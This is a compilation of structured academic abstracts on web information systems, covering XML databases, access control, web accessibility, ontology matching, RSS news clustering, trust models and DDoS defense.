Purpose
– The personal learning environment driven approach to learning suggests a shift in emphasis from a teacher‐driven knowledge‐push to a learner‐driven knowledge‐pull learning model. One concern with knowledge‐pull approaches is knowledge overload. The concepts of collective intelligence and the Long Tail provide a potential solution to help learners cope with the problem of knowledge overload. The paper aims to address these issues.
Design/methodology/approach
– Based on these concepts, the paper proposes a filtering mechanism that taps the collective intelligence to help learners find quality in the Long Tail, thus overcoming the problem of knowledge overload.
Findings
– The paper presents theoretical, design, and implementation details of PLEM, a Web 2.0 driven service for personal learning management, which acts as a Long Tail aggregator and filter for learning.
Originality/value
– The primary aim of PLEM is to harness the collective intelligence and leverage social filtering methods to rank and recommend learning entities.
Purpose
The purpose of this paper is to consider the secure publishing of XML documents, where a single copy of an XML document is disseminated and a stated role‐based access control policy (RBACP) is enforced via selective encryption. It describes a more efficient solution over previously proposed approaches, in which both policy specification and key generation are performed once, at the schema‐level. In lieu of the commonly used super‐encryption technique, in which nodes residing in the intersection of multiple roles are encrypted with multiple keys, it describes a new approach called multi‐encryption that guarantees each node is encrypted at most once.
Design/methodology/approach
This paper describes two alternative algorithms for key generation and single‐pass algorithms for multi‐encrypting and decrypting a document. The solution typically results in a smaller number of keys being distributed to each user.
Findings
The paper proves the correctness of the presented algorithms, and provides experimental results indicating the superiority of multi‐encryption over super‐encryption, in terms of encryption and decryption time requirements. It also demonstrates the scalability of the approach as the size of the input document and complexity of the schema‐level RBACP are increased.
Research limitations/implications
An extension of this work involves designing and implementing re‐usability of keyrings when a schema or ACP is modified. In addition, more flexible solutions for handling cycles in schema graphs are possible. The current solution encounters difficulty when schema graphs are particularly deep and broad.
Practical implications
The experimental results indicate that the proposed approach is scalable, and is applicable to scenarios in which XML documents conforming to a common schema are to be securely published.
Originality/value
This paper contributes to the efficient implementation of secure XML publication systems.
Purpose
– Web‐based social networks (WBSNs) are today one of the most relevant phenomena related to the advent of Web 2.0. The purpose of this paper is to discuss main security and privacy requirements arising in WBSNs, with a particular focus on access control, and to survey the main research activities carried out in the field. The social networking paradigm is today used not only for recreational purposes; it is also used at the enterprise level as a means to facilitate knowledge sharing and information dissemination both at the internet and at the intranet level. As a result of the widespread use of WBSN services, millions of individuals can today easily share personal and confidential information with an incredible amount of (possible unknown) other users. Clearly, this huge amount of information and the ease with which it can be shared and disseminated pose serious security and privacy concerns.
Design/methodology/approach
– The paper discusses the main requirements related to access control and privacy enforcement in WBSNs. It presents the protection functionalities provided by today WBSNs and examines the main research proposals defined so far, in view of the identified requirements.
Findings
– The area of access control and privacy for WBSNs is new and, therefore, many research issues still remain open. The paper provides an overview of some of these new issues.
Originality/value
– The paper provides a useful discussion of the main security and privacy requirements arising in WBSNs, with a particular focus on access control. It also surveys the main research activities carried out in the field.
Purpose – The purpose of this research is to examine web accessibility initiative (WAI) guidelines for web accessibility so as to incorporate web accessibility in information systems (IS) curriculum. Design/methodology/approach – The authors used the WebXact software accessibility evaluation tool to test the top pages of web sites of the 23 California State University (CSU) campuses in order to identify the level of compliance to federal standards. The authors also designed and conducted a questionnaire to survey the students who were enrolled in the first web development course at CSU, Dominguez Hills to access their knowledge and skills in various web accessibility topics. Findings – The research findings show that the majority of the CSU campuses' top web pages failed to meet WAI guidelines at some point. Moreover, two-thirds of the students who responded to the survey have no knowledge of web accessibility topics included in the questionnaires. The results indicate that IS programs failed to incorporate accessibility in their curricula and produce web developers with the skills and knowledge in web accessibility. Research limitations/implications – The limitation of this research is that the sample size is small. The authors intend to increase the number of universities' web site in the test and survey all students in the IS program in a future study. Practical implications – This research is background work that will help the authors to incorporate accessibility topics in their web development courses that include web accessibility basic concepts, universal design, Section 508 of the US Rehabilitation Act, web content accessibility guidelines, WAI guidelines for web accessibility, and web accessibility testing tools. Originality/value – This research improves the current state of web accessibility in curriculum higher education.
Purpose
The purpose of this paper is to reduce the number of join operations for retrieving Extensible Markup Language (XML) data from a relational database.
Design/methodology/approach
The paper proposes a new approach to eliminate the join operations for parent‐child traversing and/or sibling searching such that the performance of query processing could be improved. The rationale behind the design of the proposed approach is to distribute the structural information into relational databases.
Findings
The paper finds that the number of join operations which are needed for processing parent‐child traversal and sibling search can be bounded under the proposed approach. It also verifies the capability of the proposed approach by a series of experiments based on the XMark benchmark, for which it has encouraging results.
Research limitations/implications
Compared with previous approaches based on the structure encoding method, the proposed approach needs more space to store additional immediate predecessor's IDs. However, the approach has similar performance to others and it is much easier to implement.
Practical implications
The experimental results show that the performance of the proposed approach is less than 3 per cent of the well‐known MonetDB approach for processing benchmark queries. Moreover, its bulkloading time is much less than that for the MonetDB. There is no doubt that the approach is efficient for accessing XML data with acceptable overheads.
Originality/value
This paper contributes to the implementations of XML database systems.
Purpose
The purpose of this paper is to address the knowledge acquisition bottleneck problem in natural language processing by introducing a new rule‐based approach for the automatic acquisition of linguistic knowledge.
Design/methodology/approach
The author has developed a new machine translation methodology that only requires a bilingual lexicon and a parallel corpus of surface sentences aligned at the sentence level to learn new transfer rules.
Findings
A first prototype of a web‐based Japanese‐English translation system called Japanese‐English translation using corpus‐based acquisition of transfer (JETCAT) has been implemented in SWI‐Prolog, and a Greasemonkey user script to analyze Japanese web pages and translate sentences via Ajax. In addition, linguistic information is displayed at the character, word, and sentence level to provide a useful tool for web‐based language learning. An important feature is customization; the user can simply correct translation results leading to an incremental update of the knowledge base.
Research limitations/implications
This paper focuses on the technical aspects and user interface issues of JETCAT. The author is planning to use JETCAT in a classroom setting to gather first experiences and will then evaluate a real‐world deployment; also work has started on extending JETCAT to include collaborative features.
Practical implications
The research has a high practical impact on academic language education. It also could have implications for the translation industry by superseding certain translation tasks and, on the other hand, adding value and quality to others.
Originality/value
The paper presents an extended version of the paper receiving the Emerald Web Information Systems Best Paper Award at iiWAS2010.
Purpose
The discovery of the “right” ontology or ontology part is a central ingredient for effective ontology re‐use. The purpose of this paper is to present an approach for supporting a form of adaptive re‐use of sub‐ontologies, where the ontologies are deeply integrated beyond pure referencing.
Design/methodology/approach
Starting from an ontology draft which reflects the intended modeling perspective, the ontology engineer can be supported by suggesting similar already existing sub‐ontologies and ways for integrating them with the existing draft ontology. This paper's approach combines syntactic, linguistic, structural and logical methods into an innovative modeling‐perspective aware solution for detecting matchings between concepts from different ontologies. This paper focuses on the discovery and matching phase of this re‐use process.
Findings
Owing to the combination of techniques presented in this general approach, the work described performs in the general case as well as approaches tailored for a specific usage scenario.
Research limitations/implications
The methods used rely on lexical information obtained from the labels of the concepts and properties in the ontologies, which makes this approach appropriate in cases where this information is available. Also, this approach can handle some missing label information.
Practical implications
Ontology engineering tasks can take advantage from the proposed adaptive re‐use approach in order to re‐use existing ontologies or parts of them without introducing inconsistencies in the resulting ontology.
Originality/value
The adaptive re‐use of ontologies by finding and partially re‐using parts of existing ontological resources for building new ontologies is a new idea in the field, and the inclusion of the modeling perspective in the computation of the matches adds a new perspective that could also be exploited by other matching approaches.
Abstract— Recently, the software industry has published several proposals for transactional processing in the Web service world. Even though most proposals support arbitrary transaction models, there exists no standardized way to describe such models. This paper describes potential impacts and use cases of utilizing advanced transaction meta-models in the Web service world and introduces two suitable meta-models for defining arbitrary advanced transaction models. In order to make,these metamodels more usable in Web service environments, they had to be enhanced, and XML representations of the enhanced models had to be developed. Index Terms— Advanced transaction meta models, advanced
Purpose
– There is still little support for the consumer decision‐making process on the web, especially when prices are not the primary property of a product. Reasons for that are complex product specifications as well as often volitional weak interoperability between e‐commerce sites. This paper aims to address this issue.
Design/methodology/approach
– The semantic web is supposed to make product information more interoperable between different sites. Additionally, some products with limited time frames of availability, like real estates or second‐hand cars, require periodical searches over several days, weeks, or even months. For those kinds of products existing systems cannot be applied. Instant information about new offers on the market is therefore crucial. Wireless access to the web enables services to become instantaneous and to provide up‐to‐date information to users.
Findings
– This paper presents a framework which is based on multivariate product comparison allowing users to delegate search requests to an agent. The success of the agent depends heavily on the matching algorithm. Fuzzy utility functions and the analytical hierarchy process are a very feasible combination for the scoring of offers.
Originality/value
– The proposed system supports users finding products on the web matching specific user preferences and instantly informs them when new items become available on the virtual market. As a specific use case the framework is being applied to the real estate sector, because especially for this sector several shortcomings of the current support have been identified.
The rapidly emerging of Mobile Internet and the constantly increasing of wireless subscribers' number bring new opportunities and challenges to geographic information sharing and accessing. Current Web GISs, which are accessed by using connection based approaches, are very inefficient in fulfilling the requirements of GIS applications under open, dynamic, heterogeneous and distributed computing environments such as (Mobile) Internet. In this paper, we propose a new system for accessing and sharing distributed geographic information by using mobile agent and GML technologies, in which mobile agents are used to overcome the limitations of traditional distributed computing paradigms in (mobile) Internet context and GML is adopted as the common format for spatial information wrapping and mediation, while SVG is used as a web-map publishing format that can be processed and displayed in Web browser. A prototype is implemented, which demonstrates the effectiveness and feasibility of the proposed method.
Purpose - This paper aims to address some security issues in open systems such as service-oriented applications and grid computing. It proposes a security framework for these systems taking a trust viewpoint. The objective is to equip the entities in these systems with mechanisms allowing them to decide about trusting or not each other before starting transactions. Design/methodology/ approach - In this paper, the entities of open systems (web services, virtual organizations, etc.) are designed as software autonomous agents equipped with advanced communication and reasoning capabilities. Agents interact with one another by communicating using public dialogue game-based protocols and strategies on how to use these protocols. These strategies are private to individual agents, and are defined in terms of dialogue games with conditions. Agents use their reasoning capabilities to evaluate these conditions and deploy their strategies. Agents compute the trust they have in other agents, represented as a subjective quantitative value, using direct and indirect interaction histories with these other agents and the notion of social networks. Findings - The paper finds that trust is subject to many parameters such as the number of interactions between agents, the size of the social network, and the timely relevance of information. Combining these parameters provides a comprehensive trust model. The proposed framework is proved to be computationally efficient and simulations show that it can be used to detect malicious entities. Originality/value - The paper proposes different protocols and strategies for trust computation and different parameters to consider when computing this trust. It proposes an efficient algorithm for this computation and a prototype simulating it.
Purpose
The purpose of this paper is to introduce an expressive query language, called relational XML query language (RXQL), capable of dealing with heterogeneous Extensible Markup Language (XML) documents in data‐centric applications. In RXQL, data harmonization (i.e. the removal of heterogeneous factors from XML data) is integrated with typical data‐centric features (e.g. grouping, ordering, and aggregation).
Design/methodology/approach
RXQL is based on the XML relation representation, developed in the authors' previous work. This is a novel approach to unambiguously represent semistructured data relationally, which makes it possible in RXQL to manipulate XML data in a tuple‐oriented way, while XML data are typically manipulated in a path‐oriented way.
Findings
The user is able to describe the result of an RXQL query straightforwardly based on non‐XML syntax. The analysis of this description, through the mechanism developed in this paper, affords the automatic construction of the query result. This feature increases significantly the declarativeness of RXQL compared to the path‐oriented XML languages where the user needs to control the construction of the result extensively.
Practical implications
The authors' formal specification of the construction of the query result can be considered as an abstract implementation of RXQL.
Originality/value
RXQL is a declarative query language capable of integrating data harmonization seamlessly with other data‐centric features in the manipulation of heterogeneous XML data. So far, these kinds of XML query languages have been missing. Obviously, the expressive power of RXQL can be achieved by computationally complete XML languages, such as XQuery. However, these are not actual query languages, and the query formulation in them usually presupposes programming skills that are beyond the ordinary end‐user.
Purpose
Automated composition of semantic web services has become one of the recent critical issues in today's web environment. Despite the importance of artificial intelligence (AI)‐planning techniques for web service composition, previous works in that area do not address security issues, which is the focus of this paper. The purpose of this paper is to propose an approach to achieve security conscious composition of semantic web services.
Design/methodology/approach
The proposed approach called security conscious composition of semantic web services (SCAIMO) is based on the prior work, i.e. AIMO. The AIMO is an effective approach for web service discovery and composition based on AI‐planning, web service modeling ontology (WSMO), and description logic (DL). In this paper, definitions of secure matchmaking and web service composition are formalized based on DLs. Moreover, security capabilities and constraint types in the proposed SCAIMO framework are presented.
Findings
This paper proposes a secure task matchmaker which is responsible for matching security conscious tasks with operators and methods based on WSMO and DL to support the proposed SCAIMO framework. In addition, the paper implements and evaluates the SCAIMO using a test case and the result shows that the approach can provide an applicable solution.
Originality/value
The key contribution of this paper encompasses the new framework to support security capabilities and constraints during composition of semantic web services as well as the new secure task matchmaker.
Purpose
Estimating the sizes of query results and intermediate results is crucial to many aspects of query processing. All database systems rely on the use of cardinality estimates to choose the cheapest execution plan. In principle, the problem of cardinality estimation is more complicated in the Extensible Markup Language (XML) domain than the relational domain. The purpose of this paper is to present a novel framework for estimating the cardinality of XQuery expressions as well as their sub‐expressions. Additionally, this paper proposes a novel XQuery cardinality estimation benchmark. The main aim of this benchmark is to establish the basis of comparison between the different estimation approaches in the XQuery domain.
Design/methodology/approach
As a major innovation, the paper exploits the relational algebraic infrastructure to provide accurate estimation in the context of XML and XQuery domains. In the proposed framework, XQuery expressions are translated into an equivalent relational algebraic plans and then using a well defined set of inference rules and a set of special properties of the algebraic plan, this framework is able to provide high‐accurate estimation for XQuery expressions.
Findings
This paper is believed to be the first which provides a uniform framework to estimate the cardinality of more powerful XML querying capabilities using XQuery expressions as well as their sub‐expressions. It exploits the relational algebraic infrastructure to provide accurate estimation in the context of XML and XQuery domains. Moreover, the proposed framework can act as a meta‐model through its ability to incorporate different summarized XML structures and different histogram techniques which allows the model designers to achieve their targets by focusing their effort on designing or selecting the adequate techniques for them. In addition, this paper proposes benchmark for XQuery cardinality estimation systems. The proposed benchmark distinguishes itself from the other existing XML benchmarks in its focus on establishing the basis for comparing the different estimation approaches in the XML domain in terms of their accuracy of the estimations and their completeness in handling different XML querying features.
Research limitations/implications
The current status of this proposed XQuery cardinality estimations framework does not support the estimation of the queries over the order information of the source XML documents and does not support non‐numeric predicates.
Practical implications
The experiments of this XQuery cardinality estimation system demonstrate its effectiveness and show high‐accurate estimation results. Utilizing the cardinality estimation properties during the SQL translation of XQuery expression results in an average improvement of 20 percent on the performance of their execution times.
Originality/value
This paper presents a novel framework for estimating the cardinality of XQuery expressions as well as its sub‐expressions. A novel XQuery cardinality estimation benchmark is introduced to establish the basis of comparison between the different estimation approaches in the XQuery domain.
Querying search engines with the keyword “jaguars” returns results as diverse as web sites about cars, computer games, attack planes, American football, and animals. More and more search engines offer options to organize query results by categories or, given a document, to return a list of links to topically related documents. While information retrieval traditionally defines similarity of documents in terms of contents, it seems natural to expect that the very structure of the Web carries important information about the topical similarity of documents. Here we study the role of a matrix constructed from weighted co-citations (documents referenced by the same document), weighted couplings (documents referencing the same document), incoming, and outgoing links for the clustering of documents on the Web. We present and discuss three methods of clustering based on this
matrix construction using three clustering algorithms, K-means, Markov and Maximum Spanning Tree, respectively. Our main contribution is a clustering technique based on the Maximum Spanning Tree technique and an evaluation of its effectiveness comparatively to the two most robust alternatives: K-means and Markov clustering.
Purpose
The purpose of this paper is to propose efficient algorithms for structural grouping over Extensible Markup Language (XML) data, called TOPOLOGICAL ROLLUP (T‐ROLLUP), which are to compute aggregation functions based on XML data with multiple hierarchical levels. They play important roles in the online analytical processing of XML data, called XML‐OLAP, with which complex analysis over XML can be performed to discover valuable information from XML.
Design/methodology/approach
Several variations of algorithms are proposed for efficient T‐ROLLUP computation. First, two basic algorithms, top‐down algorithm (TDA) and bottom‐up algorithm (BUA), are presented in which the well‐known structural‐join algorithms are used. The paper then proposes more efficient algorithms, called single‐scan by preorder number and single‐scan by postorder number (SSC‐Pre/Post), which are also based on structural joins, but have been modified from the basic algorithms so that multiple levels of grouping are computed with a single scan over node lists. In addition, the paper attempts to adopt the algorithm for parallel execution in multi‐core environments.
Findings
Several experiments are conducted with XMark and synthetic XML data to show the effectiveness of the proposed algorithms. The experiments show that proposed algorithms perform much better than the naïve implementation. In particular, the proposed SSC‐Pre and SSC‐Post perform better than TDA and BUA for all cases. Beyond that, the experiment using the parallel single scan algorithm also shows better performance than the ordinary basic algorithm.
Research limitations/implications
This paper focuses on the T‐ROLLUP operation for XML data analysis. For this reason, other operations related to XML‐OLAP, such as CUBE, WINDOWING, and RANKING should also be investigated.
Originality/value
The paper presents an extended version of one of the award winning papers at iiWAS2008.
Purpose
Information retrieval (IR) and feedback in Extensible Markup Language (XML) are rather new fields for researchers; natural questions arise, such as: how good are the feedback algorithms in XML IR? Can they be evaluated with standard evaluation tools? Even though some evaluation methods have been proposed in the literature it is still not clear yet which of them are applicable in the context of XML IR, and which metrics they can be combined with to assess the quality of XML retrieval algorithms that use feedback. This paper aims to elaborate on this.
Design/methodology/approach
The efficient evaluation of relevance feedback (RF) algorithms for XML collection posed interesting challenges on the IR and database researchers. The system based on the keyword‐based queries whether on the main query or in the RF processing instead of the XPath and structure query languages which were more complex. For measuring the efficiency of the system, the paper used the extended RF algorithms (residual collection and freezeTop) for evaluating the performance of the XML search engines. Compared to previous approaches, the paper aimed at removing the effect of the results for which the system has knowledge about their relevance, and at measuring the improvement on unseen relevant elements. The paper implemented the proposed evaluation methodologies by extending a standard evaluation tool with a module capable of assessing feedback algorithms for a specific set of metrics.
Findings
In this paper, the authors create an efficient XML retrieval system that is based on a query refinement by making a feedback processing and extending the main query terms with new terms mostly related to the main terms.
Research limitations/implications
The authors are working on more efficient retrieval algorithms to get the top‐ten results related to the submitted query. Moreover, they plan to extend the system to handle complex XPath expression.
Originality/value
This paper presents an efficient evaluation of RF algorithms for XML collection retrieval system.
Web resource mining for one-stop learning is an effort to turn the Web into a convenient and valuable resource for education for the self-motivated, knowledge seeking student. It is aimed at providing an efficient and effective algorithm to generate an extremely small set of self-contained Web pages which are adequate for the student to study well about the technical subject of her choice on her own pace without requiring
clicking through numerous linked resources. In this paper, we present three different scoring measures which can be plugged into such an algorithm designed for the objective stated above. We also demonstrate the effectiveness of the algorithms proposed in this paper which are equipped with a choice of the three scoring measures by showing their promising experimental results. Our algorithms achieved up to 87% of precision in average in automatically finding relatively suitable Web resources for one-stop learning as opposed to 9% of precision offered by general purpose search engines.
Purpose
The purpose of this paper is to assign topic‐specific ratings to web pages.
Design/methodology/approach
The paper uses power iteration to assign topic‐specific rating values (called relevance ) to web pages, creating a ranking or partial order among these pages for each topic. This approach depends on a set of pages that are initially assumed to be relevant for a specific topic; the spatial link structure of the web pages; and a net‐specific decay factor designated ξ .
Findings
The paper finds that this approach exhibits desirable properties such as fast convergence, stability and yields relevant answer sets. The first property will be shown using theoretical proofs, while the others are evaluated through stability experiments and assessments of real world data in comparison with already established algorithms.
Research limitations/implications
In the assessment, all pages that a web spider was able to find in the Nordic countries were used. It is also important to note that entities that use domains outside the Nordic countries (e.g..com or.org) are not present in the paper's datasets even though they reside logically within one or more of the Nordic countries. This is quite a large dataset, but still small in comparison with the entire worldwide web. Moreover, the execution speed of some of the algorithms unfortunately prohibited the use of a large test dataset in the stability tests.
Practical implications
It is not only possible, but also reasonable, to perform ranking of web pages without using Markov chain approaches. This means that the work of generating answer sets for complex questions could (at least in theory) be divided into smaller parts that are later summed up to give the final answer.
Originality/value
This paper contributes to the research on internet search engines.
Purpose – Distributed data streams are an important topic of current research. In such a setting, data values will be missed, e.g. due to network errors. This paper aims to allow this incompleteness to be detected and overcome with either the user not being affected or the effects of the incompleteness being reported to the user. Design/methodology/approach – A model for representing the incomplete information has been developed that captures the information that is known about the missing data. Techniques for query answering involving certain and possible answer sets have been extended so that queries over incomplete data stream histories can be answered. Findings – It is possible to detect when a distributed data stream is missing one or more values. When such data values are missing there will be some information that is known about the data and this is stored in an appropriate format. Even when the available data are incomplete, it is possible in some circumstances to answer a query completely. When this is not possible, additional meta-data can be returned to inform the user of the effects of the incompleteness. Research limitations/implications – The techniques and models proposed in this paper have only been partially implemented. Practical implications – The proposed system is general and can be applied wherever there is a need to query the history of distributed data streams. The work in this paper enables the system to answer queries when there are missing values in the data. Originality/value – This paper presents a general model of how to detect, represent, and answer historical queries over incomplete distributed data streams.
Purpose
The semantic and structural heterogeneity of large Extensible Markup Language (XML) digital libraries emphasizes the need of supporting approximate queries, i.e. queries where the matching conditions are relaxed so as to retrieve results that possibly partially satisfy the user's requests. The paper aims to propose a flexible query answering framework which efficiently supports complex approximate queries on XML data.
Design/methodology/approach
To reduce the number of relaxations applicable to a query, the paper relies on the specification of user preferences about the types of approximations allowed. A specifically devised index structure which efficiently supports both semantic and structural approximations, according to the specified user preferences, is proposed. Also, a ranking model to quantify approximations in the results is presented.
Findings
Personalized queries, on one hand, effectively narrow the space of query reformulations, on the other hand, enhance the user query capabilities with a great deal of flexibility and control over requests. As to the quality of results, the retrieval process considerably benefits because of the presence of user preferences in the queries. Experiments demonstrate the effectiveness and the efficiency of the proposal, as well as its scalability.
Research limitations/implications
Future developments concern the evaluation of the effectiveness of personalization on queries through additional examinations of the effects of the variability of parameters expressing user preferences.
Originality/value
The paper is intended for the research community and proposes a novel query model which incorporates user preferences about query relaxations on large heterogeneous XML data collections.
This work has been partly funded by the Austrian Federal Ministry for Education, Science, and Culture, and the European Social Fund (ESF) under grant 31.963/46‐VII/9/2002.
The authors would like to thank Andreas Schönbeck and Alexander Knapp for their fruitful comments and contributions to prior versions of this work.
Purpose
The purpose of this paper is to provide a feature‐based characterization of version control systems (VCSs), providing an overview about the state‐of‐the‐art of versioning systems dedicated to modeling artifacts.
Design/methodology/approach
Based on a literature study of existing approaches, a description of the features of versioning systems is established. Special focus is set on three‐way merging which is an integral component of optimistic versioning. This characterization is employed on current model versioning systems, which allows the derivation of challenges in this research area.
Findings
The results of the evaluation show that several challenges need to be addressed in future developments of VCSs and merging tools in order to allow the parallel development of model artifacts.
Practical implications
Making model‐driven engineering (MDE) a success requires supporting the parallel development of model artifacts as is done nowadays for text‐based artifacts. Therefore, model versioning capabilities are a must for leveraging MDE in practice.
Originality/value
The paper gives a comprehensive overview of collaboration features of VCSs for software engineering artifacts in general, discusses the state‐of‐the‐art of systems for model artifacts, and finally, lists urgent challenges, which have to be considered in future model versioning system for realizing MDE in practice.
Purpose
TV changes in several disciplines concurrently: from analogue to digital, from scheduled broadcasts to on‐demand TV on the internet, from a lean‐back (passive) to a lean‐forward (active) media, from straight watching to the consumption of content connected to additional services, from the sole TV viewer to the viewer being part in social networks and communities regarding to the TV content, etc. The purpose of this paper is to demonstrate the adaptation of design and realization of TV program formats to the changes that happen to television. In addition, the paper would like find out how to support the design of interactions, dynamic narrations and content types as well as the role of the internet within these processes and this application area.
Design/methodology/approach
Currently, there exist many approaches towards the development of social, collaborative, and interactive TV program formats and systems. Within the scope of this paper, the authors present latest case studies and example program formats for each case. The paper examines them concerning their interaction possibilities and architecture as well as the influence and utilization of the web. Finally, the paper provides a simple categorization according to the narration character, content, and interactivity types of the listed TV program formats.
Findings
Caused by the collaborative and interactive characteristic of the web, a big influence of the web concerning the hardware‐ and content‐sided development of TV is discovered. Nevertheless, the web's potential is absolutely not exploited in this area, neither to give more dynamic to the narration, nor to appreciate the content type or the interactivity. Finally, the paper identifies a high effort, occurrence and development in the interactivity, in contrary to the narration characteristic and content types.
Research limitations/implications
Only one representative, example TV program format enabling interactions by the viewer for each case in the paper, has been chosen. The authors make no claim to be complete, in covering all genres, possibilities of interaction or TV program formats existing for the field of interactive/social/collaborative TV.
Originality/value
This paper presents an extension of a previous paper presented at the MoMM2009.
Purpose – The purpose of this paper is to describe the development of a system called Mubser to translate Arabic and English Braille into normal text. The system can automatically detect the source language and the Braille grade. Design/methodology/approach – Mubser system was designed under the MS-Windows environment and implemented using Visual C# 2.0 with an Arabic interface. The system uses the concept of rule file to translate supported languages from Braille to text. The rule file is based on XML format. The identification of the source language and grade is based on a statistical approach. Findings – From the literature review, the authors found that most researches and products do not support bilingual translation from Braille to text in either contracted or un-contracted Braille. Mubser system is a robust system that fills that gap. It helps both visually impaired and sighted people, especially Arabic native speakers, to translate from Braille to text. Research limitations/implications – Mubser is being implemented and tested by the authors for both Arabic and English languages. The tests performed so far have shown excellent results. In the future, it is planned to integrate the system with an optical Braille recognition system, enhance the system to accept new languages, support maths and scientific symbols, and add spell checkers. Practical implications – There is a desperate need for such system to translate Braille system into normal text. This system helps both sighted and blind people to communicate better. Originality/value – This paper presents a novel system for converting Braille codes (Arabic and English) into normal text.
Purpose
With the rapid emergence and explosion of the internet and the trend of globalization, a tremendous number of textual documents written in different languages are electronically accessible online from the world wide web. Efficiently and effectively managing these documents written in different languages is important to organizations and individuals. Therefore, the purpose of this paper is to propose letter frequency neural networks to enhance the performance of language identification.
Design/methodology/approach
Initially, the paper analyzes the feasibility of using a windowing algorithm in order to find the best method in selecting the features of Arabic script documents language identification using backpropagation neural networks. Previously, it had been found that the sliding window and non‐sliding window algorithm used as feature selection methods in the experiments did not yield a good result. Therefore, this paper proposes, a language identification of Arabic script documents based on letter frequency using a backpropagation neural network and used the datasets belonging to Arabic, Persian, Urdu and Pashto language documents which are all Arabic script languages.
Findings
The experiments have shown that the average root mean squared error of Arabic script document language identification based on letter frequency feature selection algorithm is lower than the windowing algorithm.
Originality/value
This paper highlights the fact that using neural networks with proper feature selection methods will increase the performance of language identification.
Purpose
Today the amount of all kinds of digital data (e.g. documents and e‐mails), existing on every user's computer, is continuously growing. Users are faced with huge difficulties when it comes to handling the existing data pool and finding specific information, respectively. This paper aims to discover new ways of searching and finding semi‐structured data by integrating semantic metadata.
Design/methodology/approach
The proposed architecture allows cross‐border searches spanning various applications and operating system activities (e.g. file access and network traffic) and improves the human working process by offering context‐specific, automatically generated links that are created using ontologies.
Findings
The proposed semantic enrichment of automated gathered data is a useful approach to reflect the human way of thinking, which is accomplished by remembering relations rather than keywords or tags. The proposed architecture supports the goals of supporting the human working process by managing and enriching personal data, e.g. by providing a database model which supports the semantic storage idea through a generic and flexible structure or the modular structure and composition of data collectors.
Originality/value
Available programs to manage personal data usually offer searches either via keywords or full text search. Each of these existing search methodologies has its shortcomings and, apart from that, people tend to forget names of specific objects. It is often easier to remember the context of a situation in which, for example, a file was created or a web site was visited. By proposing this architectural approach for handling semi‐structured data, it is possible to offer a sophisticated and more applicable search mechanism regarding the way of human thinking.
Purpose
Embedded technologies are one of the fastest growing sectors in information technology today and they are still open fields with many business opportunities. Hardly any new product reaches the market without embedded systems components any more. However, the main technical challenges include the design and integration, as well as providing the necessary degree of security in an embedded system. This paper aims to focus on a new processor architecture introduced to face security issues.
Design/methodology/approach
In the short term, the main idea of this paper focuses on the implementation of a method for the improvement of code security through measurements in hardware that can be transparent to software developers. It was decided to develop a processor core extension that provides an improved capability against software vulnerabilities and improves the security of target systems passively. The architecture directly executes bound checking in hardware without performance loss, whereas checking in software would make any application intolerably slow.
Findings
Simulation results demonstrated that the proposed design offers a higher performance and security, when compared with other solutions. For the implementation of the Secure CPU, the SPARC V8‐based LEON 2 processor from Gaisler Research was used. The processor core was adapted and finally synthesised for a GR‐XC3S‐1500 board and extended.
Originality/value
As numerically, most systems run on dedicated hardware and not on high‐performance general purpose processors. There certainly exists a market even for new hardware to be used in real applications. Thus, the experience from the related project work can lead to valuable and marketable results for businesses and academics.
Despite several efforts during the last years, the web model and semantic web technologies have not yet been successfully applied to empower Ubiquitous Computing architectures in order to create knowledge-rich environments populated by interconnected smart devices. In this paper we point out some problems of these previous initiatives and introduce SoaM (Smart Objects Awareness and Adaptation Model), an architecture for designing and seamlessly deploying web-powered context-aware semantic gadgets. Implementation and evaluation details of SoaM are also provided in order to identify future research challenges.
Purpose
Tens of thousands of news articles are posted online each day, covering topics from politics to science to current events. To better cope with this overwhelming volume of information, RSS (news) feeds are used to categorize newly posted articles. Nonetheless, most RSS users must filter through many articles within the same or different RSS feeds to locate articles pertaining to their particular interests. Due to the large number of news articles in individual RSS feeds, there is a need for further organizing articles to aid users in locating non‐redundant, informative, and related articles of interest quickly. This paper aims to address these issues.
Design/methodology/approach
The paper presents a novel approach which uses the word‐correlation factors in a fuzzy set information retrieval model to: filter out redundant news articles from RSS feeds; shed less‐informative articles from the non‐redundant ones; and cluster the remaining informative articles according to the fuzzy equivalence classes on the news articles.
Findings
The clustering approach requires little overhead or computational costs, and experimental results have shown that it outperforms other existing, well‐known clustering approaches.
Research limitations/implications
The clustering approach as proposed in this paper applies only to RSS news articles; however, it can be extended to other application domains.
Originality/value
The developed clustering tool is highly efficient and effective in filtering and classifying RSS news articles and does not employ any labor‐intensive user‐feedback strategy. Therefore, it can be implemented in real‐world RSS feeds to aid users in locating RSS news articles of interest.
Modern information systems are increasingly built on Web-based and component-based platforms. This raises the need for a service-oriented infrastructure to simplify the management and procurement of corresponding components. Special focus lies on the deployment and distribution of such software artifacts within the context of the World Wide Web to promote their reuse and there-fore to save development costs. At the same time, the integrity of the overall system must not be neglected. The use of components from third-party vendors poses a potential security threat requiring additional care. Furthermore remains the issue of usage rights for the components and the data they provide. Flexible mechanisms can offer a huge range of different licensing models to be enforced on the runtime process. This paper presents an approach to deal with these challenges together with an implementation of a software system supporting component-based Web portals.
Purpose
– WS‐ReliableMessaging specification describes a protocol that allows messages to be delivered reliably between distributed applications in the presence of software component, system, or network failures. However, it ensures reliable communication only in the context of two sites – it does not provide any means for consistent termination of the executions spanning over more than two sites. This paper aims to address this issue.
Design/methodology/approach
– The paper presents the Reliable WS‐AtomicTransaction protocol, and illustrates its implementation by exploiting WS‐Coordination, which describes an extensible framework for providing protocols that coordinate the actions of distributed applications. The paper also presents the ontology of the log, which is maintained by the Reliable WS‐AtomicTransaction protocol. The ontology is presented in a graphical form and in OWL.
Findings
– The introduction of an atomic commitment protocol and its termination protocol increase the reliability of the executions of distributed applications in service‐oriented architectures. On the other hand, it complicates the management of distributed applications as the atomic commitment protocol has to maintain the log that is used by its termination protocol.
Originality/value
– The paper presents an atomic commitment protocol and its termination protocol, which is failure resilient and non‐blocking as long as a failed site can communicate with a process that has received sufficient information to know whether the transaction will be committed or aborted. Decreasing the amount of blockings is important because blocking can cause processes to wait for an arbitrarily long period of time.
In the last a few years a number of highly publicized incidents of Distributed Denial of Service (DDoS) attacks against high-profile government and commercial websites have made people aware of the importance of providing data and services security to users. A DDoS attack is an availability attack, which is characterized by an explicit attempt from an attacker to prevent legitimate users of a service from using the desired resources. This paper introduces the vulnerability of web applications to DDoS attacks, and presents an active distributed defense system that has a deployment mixture of sub-systems to protect web applications from DDoS attacks. According to the simulation experiments, this system is effective in that it is able to defend web applications against attacks. It can avoid overall network congestion and provide more resources to legitimate web users.
Purpose
